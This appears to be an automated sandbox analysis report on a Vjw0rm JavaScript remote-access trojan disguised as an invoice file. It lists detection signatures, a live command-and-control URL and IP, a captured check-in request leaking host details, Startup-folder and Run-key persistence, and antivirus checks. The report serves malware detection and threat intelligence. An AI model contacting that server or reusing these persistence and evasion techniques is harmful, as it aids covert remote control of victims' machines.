Windows Analysis Report
PROFOMA INVOICE.js

Overview

General Information

Sample name: PROFOMA INVOICE.js
Analysis ID: 1430781
MD5: f019c6926a0098f5c5e216a08bf33f3b
SHA1: 9a2ff7851175bb4bb47476cd2e245f2f5174f325
SHA256: 585b8889a2953abaa9eb16f62c828b755587ac9f54ca3c08ccc9f4e5581ec20a
Tags: js, Vjw0rm

Detection

VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: VjW0rm
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
C2 URLs / IPs found in malware configuration
Drops script or batch files to the startup folder
JavaScript source code contains functionality to check for AV products
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory

Classification

Name: Vjw0rm
Description: VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm

AV Detection

Source: amsi64_7400.amsi.csv Malware Configuration Extractor: VjW0rm {"C2 url": "http://vjwmaster.duckdns.org:9987/Vre"}
Source: http://vjwmaster.duckdns.org:9987/Vre Virustotal: Detection: 14%
Source: PROFOMA INVOICE.js ReversingLabs: Detection: 21%
Source: PROFOMA INVOICE.js Argument value : ['"AntiVirusProduct"']
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft

Networking

Source: Traffic Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.10:49709 -> 91.92.255.61:9987
Source: Traffic Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.10:49711 -> 91.92.255.61:9987
Source: Traffic Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.10:49712 -> 91.92.255.61:9987
Source: Traffic Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.10:49713 -> 91.92.255.61:9987
Source: C:\Windows\System32\wscript.exe Network Connect: 91.92.255.61 9987
Source: Malware configuration extractor URLs: http://vjwmaster.duckdns.org:9987/Vre
Source: PROFOMA INVOICE.js Return value : ['"send"']
Source: PROFOMA INVOICE.js Argument value : ['"http://vjwmaster.duckdns.org:9987/Vre"', '"POST","http://vjwmaster.duckdns.org:9987/Vre",false', '"http://vjwmaster.duckdns.org:9987/","Vre"']
Source: PROFOMA INVOICE.js Argument value : ['"User-Agent:","Admin_B81A4609\\user-PC\\user\\Microsoft Windows 10 Pro\\Windows Defender\\\\YES\\FALSE\\"']
Source: PROFOMA INVOICE.js Argument value : ['"http://vjwmaster.duckdns.org:9987/Vre"', '"http://vjwmaster.duckdns.org:9987/","Vre"']
Source: unknown DNS query: name: vjwmaster.duckdns.org
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 9987
Source: global traffic TCP traffic: 192.168.2.10:49709 -> 91.92.255.61:9987
Source: Joe Sandbox View ASN Name: THEZONEBG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: vjwmaster.duckdns.org
Source: unknown HTTP traffic detected:
  POST /Vre HTTP/1.1
  Accept: */*
  User-Agent: Admin_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
  Accept-Language: en-ch
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: vjwmaster.duckdns.org:9987
  Content-Length: 0
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: PROFOMA INVOICE.js String found in binary or memory: http://javascriptobfuscator.com

System Summary

Source: PROFOMA INVOICE.js Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
Source: PROFOMA INVOICE.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.expl.evad.winJS@4/4@2/1
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\PROFOMA INVOICE.js
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PROFOMA INVOICE.js ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PROFOMA INVOICE.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\PROFOMA INVOICE.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\PROFOMA INVOICE.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: SetRequestHeader a0:%22User-Agent%3A%22 a1:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5CYES%5CFALSE%5C%22");IServerXMLHTTPRequest2.setRequestHeader("User-Agent:", "Admin_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:11367 o: f:SetRequestHeader r:undefined");ITextStream.WriteLine(" entry:11354 f:dX a0:661 a1:%22BC%5DA%22");ITextStream.WriteLine(" exit:11354 f:dX r:%22send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:11350 o: f:send a0:%22%22");IServerXMLHTTPRequest2.send("")
Source: PROFOMA INVOICE.js String : entropy: 6.04, length: 262, content: '\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x7
Source: PROFOMA INVOICE.js Array : entropy: 5.29, length: 477, content: '\x62\x53\x6B\x4C\x57\x51\x68\x63\x4B\x47\x46\x64\x4B\x53\x6F\x7A\x57\x50\x48\x4F''\x57\x50\x31\x30\

Boot Survival

Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DOK0DDU2VF

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 9987
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Network Connect: 91.92.255.61 9987
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: amsi64_7400.amsi.csv, type: OTHER

Remote Access Functionality

Source: Yara match File source: amsi64_7400.amsi.csv, type: OTHER